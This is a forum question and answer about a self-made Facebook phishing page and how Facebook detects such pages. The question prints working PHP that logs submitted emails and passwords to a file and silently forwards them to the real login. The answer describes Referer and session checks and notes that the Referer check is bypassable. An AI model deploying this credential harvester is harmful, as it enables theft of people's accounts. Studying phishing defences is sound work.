I'm doing a little assignment on computer security and I'm currently working on phishing.
So for educational purposes I wrote a simplist "phishing webpage" and I'm trying to understand how Facebook detects phishing fraudulent webpages.
My index.html is the facebook main page while I edited it in order to redirect the user to a phishing.php page.
phishing.php:
<?php
$file = fopen('phishing.txt', 'a');
fwrite($file, 'M: '.htmlspecialchars($_POST['email'])."\nP: ".htmlspecialchars($_POST['pass'])."\n\n");
fclose($file);
?>
<form action="https://www.facebook.com/login.php?login_attempt=1" method="post" name="frm">
<?php
foreach ($_POST as $a => $b) {
echo "<input type='hidden' name='".htmlentities($a)."' value='".htmlentities($b)."'>";
}
?>
</form>
<script language="JavaScript">
document.frm.submit();
</script>
My question comes here. Everything works well, excepted the fact that once the user (me) enters is username and password, Facebook says:
Security Notice: For your security, never enter your Facebook password on sites not located on Facebook.com
So which mechanism is used by Facebook in order to detect phishing pages like this?
Thanks!
I can think of many ways that facebook does this
Method one: HTTP Referer
In every HTTP request that you send, a referer is sent along with it to indicate where you came from, facebook can simply do the following
$referer = parse_url($_SERVER['HTTP_REFERER'], PHP_URL_HOST);
if($referer != 'facebook.com') // Phishing
Method two: Sessions
Facebook may start a session on their index.php page that will be checked once submit the login form, for example
index.php
$_SESSION['coming_from_facebook'] = true;
login.php
if($_SESSION['coming_from_facebook'] != true) // Phishing
This is all psuedo-code and the first method is easily bypassable as users can modify referers.